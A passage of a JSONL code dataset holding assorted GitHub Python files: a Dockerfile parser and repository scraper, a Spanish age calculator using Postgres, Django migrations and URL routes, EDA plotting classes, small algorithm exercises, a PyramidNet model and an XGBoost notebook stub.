dockerfile[dictKey]:\n dockerfile[dictKey][\"ARG\"].append(re.match('\\w{3} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"ARG\"]=[re.match('\\w{3} (.*)',td).group(1)]\n previousDockerLine = \"ARG\"\n elif(td.lower().startswith(\"env \")):\n #dockerEnv.append(re.match('\\w{3} (.*)',td).group(1))\n if \"ENV\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"ENV\"].append(re.match('\\w{3} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"ENV\"]=[re.match('\\w{3} (.*)',td).group(1)]\n previousDockerLine = \"ENV\"\n elif(td.lower().startswith(\"onbuild \")):\n #dockerOnbuild.append(re.match('\\w{7} (.*)',td).group(1))\n if \"ONBUILD\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"ONBUILD\"].append(re.match('\\w{7} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"ONBUILD\"]=[re.match('\\w{7} (.*)',td).group(1)]\n previousDockerLine = \"ONBUILD\"\n elif(td.lower().startswith(\"maintainer \")):\n #dockerMaintainer = re.match('\\w{10} (.*)',td).group(1)\n if \"MAINTAINER\" in dockerfile[dictKey]:\n dockerfile[dictKey][\"MAINTAINER\"].append(re.match('\\w{10} (.*)',td).group(1))\n else:\n dockerfile[dictKey][\"MAINTAINER\"]=[re.match('\\w{10} (.*)',td).group(1)]\n previousDockerLine = \"MAINTAINER\"\n elif(not td):\n previousDockerLine = \"\"\n elif(previousDockerLine == \"RUN\"):\n dockerfile[dictKey][\"RUN\"][-1]=dockerfile[dictKey][\"RUN\"][-1]+td\n elif(previousDockerLine == \"LABEL\"):\n dockerfile[dictKey][\"LABEL\"].append(td)\n dockerfileRepo[\"config\"]=dockerfile\n return mongoDockerFiles.insert_one(dockerfileRepo).inserted_id\n else:\n print(\"Dockerfile já inserido!\")\n return savedDockerFile.get(\"_id\")\n\nt=[]\nq = queue.Queue()\ninitialId=445301\nthreadsNumber=400\ntokenQtd=len(tokens)\nprint(\"Iniciando com id \"+str(initialId))\nfor i in range(initialId,len(results)+1):\n t.append(threading.Thread(target=repoExtractGit,args=(i,results[i-1][1],tokens[i%tokenQtd],results[i-1][2],q,)))\n t[-1].start()\n if(len(t)==threadsNumber):\n resultT=[]\n while(len(resultT)=dia):\n if(fecha.month>=mes):\n añox=(fecha.year)-año\n else:\n añox=(fecha.year)-año-1\n else:\n if(fecha.month>=mes):\n añox=(fecha.year)-año\n else:\n añox=(fecha.year)-año-1\n except:\n print('Error de ingreso. - Ingrese un valor numerico')\n añoa=str(año)\n mesa=str(mes)\n diaa=str(dia)\n añoxa=str(añox)\n print('\\nUsted nacio el dia: : ',dia,' del mes ',mes, ' del año ',año,'. Usted tiene: ',añox,'años')\n conn = psycopg2.connect(\n database=\"exam1\", user='postgres', password='123', host='localhost', port= '5432'\n )\n conn.autocommit = True\n cursor = conn.cursor()\n cursor.execute('''INSERT INTO p4 (oo,mes,dia,edad) VALUES (%s, %s, %s, %s)''',(año,mes,dia,añox))\n conn.commit()\n conn.close()\n archivo_texto=open(\"201700325.txt\",\"a\")\n archivo_texto.write('\\n\\nCuarto Programa:\\nUsted nacio el dia: '+diaa+' del mes '+mesa+ ' del año '+añoa+'. Usted tiene: '+añoxa+'años')\n archivo_texto.close()\n elif menu==0:\n break\n else:\n z=int(input('Opcion incorrecta \\n Oprima cualqier letra'))\n except:\n print('Error de ingreso. - Ingrese un valor numerico')\n","repo_name":"EETS7/Python---Examen---Proyectos","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32907691370","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('profiles', '0001_initial'),\n ('correspondence', '0001_initial'),\n ('scanning', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='letter',\n name='document',\n field=models.ForeignKey(blank=True, to='scanning.Document', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='letter',\n name='org',\n field=models.ForeignKey(blank=True, to='profiles.Organization', help_text=b'Organization for the return address for this letter', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='letter',\n name='recipient',\n field=models.ForeignKey(related_name='received_letters', blank=True, to=settings.AUTH_USER_MODEL, null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='letter',\n name='sender',\n field=models.ForeignKey(related_name='authored_letters', blank=True, to=settings.AUTH_USER_MODEL),\n preserve_default=True,\n ),\n ]\n","repo_name":"yourcelf/btb","sub_path":"scanblog/correspondence/migrations/0002_auto_20150429_1353.py","file_name":"0002_auto_20150429_1353.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"54"} +{"seq_id":"9951973748","text":"import re\n\nclass Team:\n def __init__(self, name):\n self.name = name\n self.points = 0\n self.goals = 0\n\n def add_points(self, points):\n self.points += points\n \n def add_goals(self, goals):\n self.goals += goals\n\n def __str__(self):\n return f\"{self.name} {self.points}\"\n\n\ndef creat_team(team_name, teams_list):\n if not team_name in list(map(lambda t: t.name, teams_list)):\n team = Team(team_name)\n teams_list.append(team)\n return team\n\n return list(filter(lambda t: t.name == team_name, teams_list))[0]\n \n\ncode = input()\nif '?' in code:\n code = code.replace('?', '\\\\?')\n\ndata = input()\nteams_list = []\nwhile data != 'final':\n teams_pattern = r'(?<={code})[A-Za-z]*(?={code})'\n pattern = teams_pattern.format(code = code)\n\n teams = re.findall(pattern, data)\n correct_named_teams = list(map(lambda t: t.upper()[::-1], teams))\n\n team_1 = creat_team(correct_named_teams[0], teams_list)\n team_2 = creat_team(correct_named_teams[1], teams_list)\n\n scores_pattern = r'\\d+:\\d+'\n result_as_str = re.findall(scores_pattern, data)[0].split(':')\n result_int = list(map(int, result_as_str))\n\n if result_int[0] > result_int[1]:\n team_1.add_points(3)\n elif result_int[0] < result_int[1]:\n team_2.add_points(3)\n else:\n team_1.add_points(1)\n team_2.add_points(1)\n\n team_1.add_goals(result_int[0])\n team_2.add_goals(result_int[1])\n \n data = input()\n\nsorted_teams = sorted(teams_list, key=lambda t: (-t.points, t.name))\ntop_3 = sorted(teams_list, key=lambda t: (-t.goals, t.name))[:3]\n\nprint('League standings:')\n[print(f\"{index+1}. {team}\") for index, team in enumerate(sorted_teams)]\n\nprint('Top 3 scored goals:')\n[print(f\"- {team.name} -> {team.goals}\") for team in sorted(top_3, key=lambda t: (t.goals), reverse=True)]","repo_name":"stanislavtz/Python","sub_path":"Fundamentals/Exam-Preparation/Exam-Prep-I/football_league.py","file_name":"football_league.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72090221602","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\n\n\"\"\"\nClasse para obtenção dos valores nulos de cada variável.\nAtributos:\nfonte: str\ndados: str\n\"\"\"\nclass Nulos:\n \n def __init__(self, fonte, dados):\n self.__fonte = fonte\n self.__dados = dados\n \n @property\n def fonte(self):\n return self.__fonte\n \n @property\n def dados(self):\n return self.__dados\n \n \"\"\"\n Função que retorna os valores nulos da variável.\n \"\"\"\n def nulos(self):\n valores_nulos = self.__dados.query(f'{self.__fonte} == 0')[self.__fonte]\n if len(valores_nulos) > 0:\n return self.__dados.query(f'{self.__fonte} == 0')[self.__fonte]\n else:\n return valores_nulos\n\n\"\"\"\nClasse que seleciona os valores não nulos de cada variável.\nAtributos:\nfonte: str\ndados: str\n\"\"\" \nclass Selecao:\n\n def __init__(self, fonte, dados):\n self.__fonte = fonte\n self.__dados = dados\n \n @property\n def fonte(self):\n return self.__fonte\n \n @property\n def dados(self):\n return self.__dados\n \n \"\"\"\n Função que seleciona os valores não nulos de cada variável.\n \"\"\"\n def seleciona(self, dataframe=None):\n\n if dataframe == True:\n\n if len(Nulos(f'{self.__fonte}', self.__dados).nulos() > 0):\n self.__fonte = self.__dados.query(f'{self.__fonte} > 0')\n else:\n self.__fonte = self.__dados\n return self.__fonte\n\n else:\n if len(Nulos(f'{self.__fonte}', self.__dados).nulos() > 0):\n self.__fonte = self.__dados.query(f'{self.__fonte} > 0')[self.__fonte]\n else:\n self.__fonte = self.__dados[f'{self.__fonte}']\n return self.__fonte\n\n\"\"\"\nClasse que seleciona os valores não nulos da variável no dataframe \"soma\".\nAtributos:\nfonte: str\ndados: str\nsoma: str\n\"\"\" \nclass Selecao_Soma:\n \n def __init__(self, fonte, soma):\n self.__fonte = fonte\n self.__soma = soma\n \n @property\n def fonte(self):\n return self.__fonte\n \n @property\n def soma(self):\n return self.__soma\n \n \"\"\"\n Função que seleciona os valores não nulos da variável no dataframe \"soma\".\n \"\"\"\n def seleciona(self):\n if len(self.__soma.query(f'{self.__fonte} == 0')[self.__fonte]) > 0:\n self.__fonte = self.__soma.query(f'{self.__fonte} > 1')\n else:\n self.__fonte = self.__soma\n return self.__fonte\n\n\"\"\"\nClasse que seleciona os valores não nulos de cada variável no dataframe \"soma_perc\".\nAtributos:\nfonte: str\ndados: str\nsoma: str\nsoma_perc: str\n\"\"\" \nclass Selecao_Soma_Perc:\n \n def __init__(self, fonte, soma, soma_perc):\n self.__fonte = fonte\n self.__soma = soma\n self.__soma_perc = soma_perc\n \n @property\n def fonte(self):\n return self.__fonte\n \n @property\n def soma(self):\n return self.__soma\n \n @property\n def soma_perc(self):\n return self.__soma_perc\n \n \"\"\"\n Função que seleciona os valores não nulos da variável no dataframe \"soma_perc\".\n \"\"\"\n def seleciona(self):\n lista = []\n for i in self.__soma.query(f'{self.__fonte} > 1').index:\n lista.append(i)\n data = self.__soma_perc.loc[lista[0]:lista[-1]]\n return data \n\n\"\"\"\nClasse que agrega funções referentes à análises estatísticas de cada variável.\nAtributos:\nfonte: str\ndados: str\n\"\"\" \nclass Stats:\n \n def __init__(self, fonte, dados):\n self.__fonte = fonte\n self.__dados = dados\n \n @property\n def fonte(self):\n return self.__fonte\n \n @property\n def dados(self):\n return self.__dados\n \n \"\"\"\n Função que retorna a descrição de parâmetros estatísticos da variável.\n \"\"\"\n def descricao(self):\n describe = (Selecao(f'{self.__fonte}', self.__dados).seleciona().describe())\n return pd.DataFrame(describe)\n \n \"\"\"\n Função que retorna os valores outliers da variável.\n \"\"\"\n def get_outliers(self):\n FIQ = Selecao(f'{self.__fonte}', self.__dados).seleciona().describe()['75%'] - Selecao(f'{self.__fonte}', self.__dados).seleciona().describe()['25%']\n inf = Selecao(f'{self.__fonte}', self.__dados).seleciona().describe()['25%'] - 1.5*FIQ\n sup = Selecao(f'{self.__fonte}', self.__dados).seleciona().describe()['75%'] + 1.5*FIQ\n \n out_inf = pd.DataFrame(self.__dados.query(f'{self.__fonte} < {inf}')[self.__fonte])\n out_sup = pd.DataFrame(self.__dados.query(f'{self.__fonte} > {sup}')[self.__fonte])\n\n if (len(out_inf) > 0) & (len(out_sup) > 0):\n return out_inf, out_sup\n elif (len(out_sup) > 0) & (len(out_inf) == 0):\n return out_sup\n elif (len(out_sup) == 0) & (len(out_inf) > 0):\n return out_inf\n else:\n return print('Sem Outliers')\n\n\"\"\"\nClasse que agrega funções referentes à plotagem dos gráficos de cada variável.\nAtributos:\nfonte: str\ndados: str\nsoma: str\nsoma_perc: str\n\"\"\" \nclass Graficos:\n \n def __init__(self, fonte, dados, soma, soma_perc):\n self.__fonte = fonte\n self.__dados = dados\n self.__soma = soma\n self.__soma_perc = soma_perc\n \n @property\n def fonte(self):\n return self.__fonte\n \n @property\n def dados(self):\n return self.__dados\n \n @property\n def soma(self):\n return self.__soma\n \n @property\n def soma_perc(self):\n return self.__soma_perc\n\n \"\"\"\n Função que plota um \"boxplot\" analisando o conjunto de dados completo.\n \"\"\"\n def boxplot(self):\n \n # Plot do Gráfico\n fig, ax = plt.subplots(figsize=(20,10))\n ax = sns.boxplot(data=Selecao(f'{self.__fonte}', self.__dados).seleciona(), orient='h', palette='gist_heat_r')\n \n # Personalização\n ax.tick_params(labelsize=16)\n titulo = self.__fonte.replace('_',' ')\n ax.set_title(f'{titulo} (GWh)',fontsize=24)\n ax.set_xlabel('Energia Despachada (GWh)', fontsize=18)\n sns.color_palette(\"GnBu\", as_cmap=True)\n\n return plt.show()\n\n \"\"\"\n Função que plota \"boxplots\" referentes à cada mês .\n \"\"\"\n def boxplot_mensal(self):\n \n # Plot do Gráfico\n fig, ax = plt.subplots(figsize=(20,10))\n ax = sns.boxplot(data=Selecao(f'{self.__fonte}', self.__dados).seleciona(dataframe=True), y=self.__fonte, x='month', orient='v', palette='gist_heat_r')\n \n # Personalização\n ax.tick_params(labelsize=16)\n titulo = self.__fonte.replace('_',' ')\n ax.set_title(f'{titulo} (GWh)',fontsize=24)\n ax.set_xlabel('Mês', fontsize=18)\n ax.set_ylabel('Energia Despachada (GWh)', fontsize=18)\n sns.color_palette(\"YlOrBr\", as_cmap=True)\n \n return plt.show()\n\n \"\"\"\n Função que plota um gráfico de linha.\n \"\"\" \n def lineplot(self):\n \n # Plot do Gráfico\n fig,ax = plt.subplots(figsize=(20,10), dpi= 100)\n sns.lineplot(data=Selecao(f'{self.__fonte}', self.__dados).seleciona(), palette='gist_heat_r', color='darkred')\n \n # Personalização\n titulo = self.__fonte.replace('_',' ')\n plt.title(f'{titulo} (GWh)', fontsize=22)\n plt.xticks(rotation=0, fontsize=12, horizontalalignment='center', alpha=.7)\n plt.yticks(fontsize=12, alpha=.7)\n plt.grid(axis='both', alpha=.3)\n ax.set_xlabel('')\n ax.set_ylabel('')\n \n # Remoção de Bordas\n plt.gca().spines[\"top\"].set_alpha(0.0) \n plt.gca().spines[\"bottom\"].set_alpha(0.3)\n plt.gca().spines[\"right\"].set_alpha(0.0) \n plt.gca().spines[\"left\"].set_alpha(0.3)\n \n return plt.show()\n \n \"\"\"\n Função que plota um gráfico de colunas em conjunto com um gráfico de linhas, ambos com eixos y separados.\n \"\"\"\n def mixedplot(self): \n \n # Plot do Gráfico\n fig, ax1 = plt.subplots(figsize=(20,10))\n sns.barplot(data = Selecao_Soma(f'{self.__fonte}', self.__soma).seleciona(), x=Selecao_Soma(f'{self.__fonte}', self.__soma).seleciona().index.year.astype('string'), y=self.__fonte, alpha=0.5, ax=ax1, color = 'orangered')\n ax2 = ax1.twinx()\n sns.lineplot(data = Selecao_Soma_Perc(f'{self.__fonte}', self.__soma, self.__soma_perc).seleciona(), x = Selecao_Soma(f'{self.__fonte}', self.__soma).seleciona().index.year.astype('string'), y = f'{self.__fonte}_perc', marker='o', sort = False, ax=ax2, color='darkred')\n\n # Personalização\n titulo = self.__fonte.replace('_',' ')\n plt.title(f'Evolução Anual: {titulo}', fontsize=22)\n plt.xticks(rotation=0, fontsize=12, horizontalalignment='center', alpha=.7)\n plt.yticks(fontsize=12, alpha=.7)\n plt.grid(axis='both', alpha=.3)\n ax1.set_xlabel('')\n ax1.set_ylabel('Energia Despachada (GWh)', fontsize=18)\n ax2.set_ylabel('Variação Percentual (%)', fontsize=18)\n \n # Linha que indica o eixo y percentual\n plt.axhline(c='black', ls='--')\n \n \"\"\"\n Função que plota um gráfico de área empilhada.\n Atributo:\n selecao: pandas.DataFrame\n \"\"\"\n @classmethod\n def areaplot(cls, selecao):\n \n # Criação do DataFrame de Seleção dos Dados\n col = selecao.columns\n n = len(col)-1\n\n list = []\n labels = []\n for j in range(len(col)-1):\n perc = selecao[col[j+1]]/selecao[col[0]]*100\n list.append(perc)\n labels.append(col[j+1])\n for k in range(len(labels)):\n labels[k] = labels[k].replace('_', ' ')\n \n selecao = pd.concat([selecao, perc], axis=1)\n selecao = selecao.rename(columns = {0: f'{col[j+1]}_per'})\n\n selecao = selecao.reset_index()\n \n # Plot do Gráfico\n fig,ax = plt.subplots(figsize=(18,9.8), dpi= 100)\n colors = sns.color_palette('gist_heat_r', n)\n plt.stackplot(selecao.date, list, labels=labels, colors=colors)\n \n # Personalização\n titulo = col[0].replace('_',' ')\n plt.title(f'Decomposição Percentual: {titulo} (%)', fontsize=22)\n plt.xticks(rotation=0, fontsize=12, horizontalalignment='center', alpha=.7)\n plt.yticks(fontsize=12, alpha=.7)\n plt.grid(axis='both', alpha=.3)\n ax.legend(frameon=False, loc=9, ncol=n, fontsize='large') \n ax.set_xlabel('')\n ax.set_ylabel('')\n \n # Remoção de Bordas\n plt.gca().spines[\"top\"].set_alpha(0.0) \n plt.gca().spines[\"bottom\"].set_alpha(0.3)\n plt.gca().spines[\"right\"].set_alpha(0.0) \n plt.gca().spines[\"left\"].set_alpha(0.3)\n \n return plt.show()\n\n\"\"\"\nClasse que agrega funções referentes à funções de avaliação da correlação entre as variáveis.\nAtributos:\nselecao: pandas.DataFrame\n\"\"\" \nclass Correlacao:\n \n def __init__(self, selecao):\n self.__selecao = selecao\n \n @property\n def selecao(self):\n return self.__selecao\n \n \"\"\"\n Função que retornam gráficos de correlação entre as varíaveis em forma matricial, de forma que são plotados:\n Inferiores à diagonal - Gráfico de dispersão entre duas variáveis;\n Diagonal - Histograma daquela variável;\n Superiores à diagonal - Gráfico de distribuição entre duas variáveis do tipo KDE (Kernel Density Estimate).\n \"\"\"\n def pairgrid(self):\n \n g = sns.PairGrid(self.__selecao, diag_sharey=False)\n g.map_upper(sns.scatterplot, color='darkred')\n g.map_lower(sns.kdeplot, cmap = 'Reds')\n g.map_diag(sns.kdeplot, color='darkred')\n \n \"\"\"\n Função que retorna um mapa de calor das variáveis selecionadas.\n \"\"\"\n def heatmap(self):\n \n corrv=np.corrcoef(self.__selecao, rowvar=False)\n mask = np.triu(np.ones_like(np.corrcoef(corrv, rowvar=False)))\n fig, ax = plt.subplots(figsize=(10,6), dpi= 100)\n heatmap = sns.heatmap(corrv, annot=True, linewidths=.5, xticklabels = self.__selecao.columns, yticklabels = self.__selecao.columns, fmt='.2g', mask=mask, ax=ax)\n\n \"\"\"\n Função que retorna valores específicos de correlação entre as variáveis.\n Atributos:\n numero: float (valor de correlação utilizado para comparação)\n relacao: str ('>' ou '<')\n \"\"\"\n def seleciona_corr(self, numero, relacao): \n corrr = self.__selecao.corr().values\n col = self.__selecao.columns\n la = []\n lb = []\n lc = []\n r, c = self.__selecao.shape\n for i in range(c):\n for j in range(i+1, c):\n if relacao == '>':\n if corrr[i, j] > numero:\n la.append(col[i])\n lb.append(col[j])\n lc.append((corrr[i, j]))\n if relacao == '<':\n if corrr[i, j] < numero:\n la.append(col[i])\n lb.append(col[j])\n lc.append((corrr[i, j]))\n dfe = pd.DataFrame({\n 'Variável 1': la,\n 'Variável 2': lb,\n 'Correlação': lc\n })\n dfe = dfe.sort_values(by='Correlação', ascending=False)\n dfe.reset_index(drop=True, inplace=True)\n return dfe","repo_name":"LuanRD/energia-eletrica","sub_path":"classes_eda.py","file_name":"classes_eda.py","file_ext":"py","file_size_in_byte":13558,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"17008849809","text":"from django.urls import path\r\n\r\nfrom .views import (\r\n acceptFriendRequest,\r\n deleteFriendRequest,\r\n getFriendRequests,\r\n getFriends,\r\n getFriendSuggestions,\r\n sendFriendRequest,\r\n)\r\n\r\nurlpatterns = [\r\n # auth token required in header for all requests\r\n path(\"friends/\", getFriends), # GET request\r\n path(\"friends/requests/\", getFriendRequests), # GET request\r\n path(\"friends/request/send/\", sendFriendRequest), # POST request\r\n path(\"friends/request/accept/\", acceptFriendRequest), # PUT request\r\n path(\"friends/request/delete//\", deleteFriendRequest), # DELETE request\r\n path(\"friends/suggestions/\", getFriendSuggestions), # GET request\r\n # path('friend/unfriend',''), #DELETE request\r\n]\r\n","repo_name":"Anyesh/totoro","sub_path":"friends/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"25520276123","text":"class vertex:\n __properties = {}\n __neighbours = {}\n\n def __init__(self, propdict, neighbourdict={}):\n if neighbourdict is None:\n neighbourdict = {}\n vertex.__properties = propdict\n vertex.__neighbours = neighbourdict\n\n def __getitem__(self, key):\n if key == \"neighbours\":\n return [neighbour for neighbour in vertex.__neighbours]\n return vertex.__properties[key]\n\n def __setitem__(self, key, value):\n if key == \"neighbours\" and type(value) != dict:\n raise SyntaxError(\n f\"Incompatible datatype expected a type {type(vertex.__neighbours)} whereas got a{type(value)}\")\n elif key == \"neighbour\" and type(value) == dict:\n vertex.__neighbours = value\n else:\n vertex.__properties[key] = value","repo_name":"Raagulbharatwaj/pyds-0.1.0","sub_path":"pyds/graph/vertex.py","file_name":"vertex.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16784915443","text":"def check(a):\n global ans, cnt\n if sum(ans) == k:\n cnt += 1\n return\n if sum(ans) > k:\n return\n for i in range(a+1, n):\n ans.append(lst[i])\n check(i)\n ans.pop()\n\n\nip = int(input())\n\nfor case in range(1, ip+1):\n n, k = map(int, input().split())\n lst = list(map(int, input().split()))\n ans = list()\n cnt = 0\n check(-1)\n print(f'#{case} {cnt}')\n","repo_name":"yyytae0/algorithm-training","sub_path":"swea/ssafy/13839.py","file_name":"13839.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5172379063","text":"# Aqui defino algumas funções auxiliares que convertem estruturas de dados do\n# desafio do veiculo ideal\n\nfrom classes_vec_ide import Veiculo, Item, Entrega, Plataforma\n\ndef converte_dict_Itens( itens_info: dict ) -> list:\n\n \"\"\" \n Função que converte lista de dicionários de itens: \n \n itens_info = [\n { 'item': 'leite', 'largura': 1, 'altura': 2, 'espessura': 3, 'peso': 4 },\n { 'item': 'café', 'largura': 2, 'altura': 50, 'espessura': 70, 'peso': 7 }\n ]\n \n Em uma lista de objetos Item. \n \"\"\"\n\n nova_lista = []\n\n # Os objetos Item são instanciados e armazenados na nova lista\n\n for item_info in itens_info: \n\n item = Item( item_info['item'], item_info['largura'], item_info['altura'],\n item_info['espessura'], item_info['peso'] )\n\n nova_lista.append(item)\n\n return nova_lista\n\ndef faz_dicionario( lala: Plataforma, ogi: Plataforma ) -> dict: \n \n ''' \n Essa função é responsável por criar as respostas que serão retornadas pela função vec_ide(), \n que serão transformadas em resposta da API para o usuário\n '''\n # Mensages caso os critérios de seleção dos veiculos falhem\n if lala.num_vec > 1: return {'Erro': 'Não selecionou veiculo da Lala'}\n \n if ogi.num_vec > 1: return {'Erro': 'Não selecionou veiculo da Ogi'}\n \n #Mensagens caso o problema tenha tido uma solução \n if lala.num_vec == 0 and ogi.num_vec == 1: \n return { 'Lala':'Não há veiculo adequado', 'Ogi':ogi.veiculos[0].tipo }\n \n if lala.num_vec == 1 and ogi.num_vec == 0: \n return { 'Lala':lala.veiculos[0].tipo, 'Ogi':'Não há veiculo adequado' }\n\n if lala.num_vec == 0 and ogi.num_vec == 0: \n return { 'Lala':'Não há veiculo adequado', 'Ogi':'Não há veiculo adequado' }\n\n if lala.num_vec == 1 and ogi.num_vec == 1: \n return { 'Lala':lala.veiculos[0].tipo, 'Ogi':ogi.veiculos[0].tipo }\n \n","repo_name":"ian011403/Desafio-Data-Machina","sub_path":"Veículo Ideal/converte.py","file_name":"converte.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1210216322","text":"\"\"\"\n계단오르기\n22.02.09\n\n\n6\n10\n20\n15\n25\n10\n20\n\n\n\"\"\"\n\ndef solution(n, w):\n if n == 1:\n return w[0]\n if n == 2:\n return w[0] + w[1]\n\n dp = [0 for _ in range(n+1)]\n dp[0], dp[1], dp[2] = 0, w[0], w[0]+w[1]\n for k in range(3, n+1):\n dp[k] = max(dp[k-3]+w[k-2]+w[k-1], dp[k-2]+w[k-1])\n return dp[n]\n\n\nn = int(input())\nw = [int(input()) for _ in range(n)]\nprint(solution(n, w))\n","repo_name":"angelatto/Algorithm","sub_path":"BAEKJOON/1일1솔/2579.py","file_name":"2579.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2243466776","text":"import sys\nfrom paralympic_app import db\nfrom paralympic_app.models import Event\nfrom paralympic_app.schemas import EventSchema\n\n\n# Marshmallow Schemas\nevents_schema = EventSchema(many=True)\nevent_schema = EventSchema()\n\n\ndef get_events():\n \"\"\"Function to get all events from the database as objects and convert to json.\n\n NB: This was extracted to a separate function as it is used in multiple places\n \"\"\"\n all_events = db.session.execute(db.select(Event)).scalars()\n event_json = events_schema.dump(all_events)\n return event_json\n\n\ndef get_event(event_id):\n \"\"\"Function to get a single event as a json structure\n\n :return Event json or None: Event JSON if event exists, otherwise None\"\"\"\n event = db.session.execute(\n db.select(Event).filter_by(event_id=event_id)\n ).scalar_one_or_none()\n if event:\n result = events_schema.dump(event)\n return result\n else:\n return event\n","repo_name":"megorov12/paralympics_and_others","sub_path":"paralympic_app/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4256945223","text":"import tensorflow as tf\nfrom tensorflow.keras import Model, Sequential\nfrom tensorflow.keras.layers import Layer\n\nfrom hanser.models.layers import Pool2d, Conv2d, Norm, Act, GlobalAvgPool, Linear\nfrom hanser.models.modules import PadChannel\nfrom hanser.models.cifar.shakedrop.layers import ShakeDrop\n\n__all__ = [\n \"PyramidNet\"\n]\n\n\nclass Shortcut(Sequential):\n def __init__(self, in_channels, out_channels, stride):\n layers = []\n if stride == 2:\n layers.append(Pool2d(2, 2, type='avg'))\n if in_channels != out_channels:\n layers.append((PadChannel(out_channels - in_channels)))\n super().__init__(layers)\n\n\nclass BasicBlock(Layer):\n expansion = 1\n\n def __init__(self, in_channels, channels, stride=1, p_shakedrop=0):\n super().__init__()\n branch1 = [\n Norm(in_channels),\n Conv2d(in_channels, channels, kernel_size=3, stride=stride,\n norm='def', act='def'),\n Conv2d(channels, channels, kernel_size=3, norm='def'),\n ]\n if p_shakedrop:\n branch1.append(ShakeDrop(p_shakedrop, (-1, 1), (0, 1)))\n self.branch1 = Sequential(branch1)\n self.branch2 = Shortcut(in_channels, channels, stride)\n\n def call(self, x):\n return self.branch1(x) + self.branch2(x)\n\n\nclass Bottleneck(Layer):\n expansion = 4\n\n def __init__(self, in_channels, channels, stride=1, p_shakedrop=0):\n super().__init__()\n out_channels = channels * self.expansion\n branch1 = [\n Norm(in_channels),\n Conv2d(in_channels, channels, kernel_size=1,\n norm='def', act='def'),\n Conv2d(channels, channels, kernel_size=3, stride=stride,\n norm='def', act='def'),\n Conv2d(channels, out_channels, kernel_size=1,\n norm='def'),\n ]\n if p_shakedrop:\n branch1.append(ShakeDrop(p_shakedrop, (-1, 1), (0, 1)))\n self.branch1 = Sequential(branch1)\n self.branch2 = Shortcut(in_channels, out_channels, stride)\n\n def call(self, x):\n return self.branch1(x) + self.branch2(x)\n\n\ndef rd(c):\n return int(round(c, 2))\n\n\nclass PyramidNet(Model):\n def __init__(self, start_channels, alpha, depth, block='bottleneck', p_shakedrop=0.5, num_classes=10):\n super().__init__()\n\n if block == 'basic':\n num_layers = [(depth - 2) // 6] * 3\n block = BasicBlock\n elif block == 'bottleneck':\n num_layers = [(depth - 2) // 9] * 3\n block = Bottleneck\n else:\n raise ValueError(\"block must be `basic` or `bottleneck`, got %s\" % block)\n\n self.num_layers = num_layers\n\n strides = [1, 2, 2]\n\n add_channel = alpha / sum(num_layers)\n in_channels = start_channels\n\n self.init_block = Conv2d(3, start_channels, kernel_size=3, norm='def')\n\n channels = start_channels\n k = 1\n units = []\n for n, s in zip(num_layers, strides):\n for i in range(n):\n stride = s if i == 0 else 1\n channels = channels + add_channel\n units.append(block(in_channels, rd(channels), stride=stride,\n p_shakedrop=k / sum(num_layers) * p_shakedrop))\n in_channels = rd(channels) * block.expansion\n k += 1\n\n self.units = units\n self.post_activ = Sequential([\n Norm(in_channels),\n Act(),\n ])\n\n assert (start_channels + alpha) * block.expansion == in_channels\n\n self.final_pool = GlobalAvgPool()\n self.fc = Linear(in_channels, num_classes)\n\n def call(self, x):\n x = self.init_block(x)\n for unit in self.units:\n x = unit(x)\n x = self.post_activ(x)\n\n x = self.final_pool(x)\n x = self.fc(x)\n return x\n\n\ndef test_net():\n model = PyramidNet(16, 270, 164, 'bottleneck')\n model.build((None, 32, 32, 3))\n model.call(tf.keras.layers.Input((32, 32, 3)))\n model.summary()","repo_name":"sbl1996/hanser","sub_path":"hanser/models/cifar/shakedrop/pyramidnet.py","file_name":"pyramidnet.py","file_ext":"py","file_size_in_byte":4073,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"54"} +{"seq_id":"2511961055","text":"\n# coding: utf-8\n\n# In[2]:\n\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\n\n\n# In[3]:\n\n\nimport xgboost as xgb\n\n\n# In[4]:\n\n#use 10000 records for model training\npd.set_option(\"display.max_columns\", 500)\ntrain = pd.read_csv(\"../input/train_V2.csv\")\ntrain = train.sample(n=10000, random_state=1)\n\n\n# In[5]:\n\n\ntrain.head(10)\n\n\n# In[6]:\n\n\ntrain.shape\n\n\n\n\n# 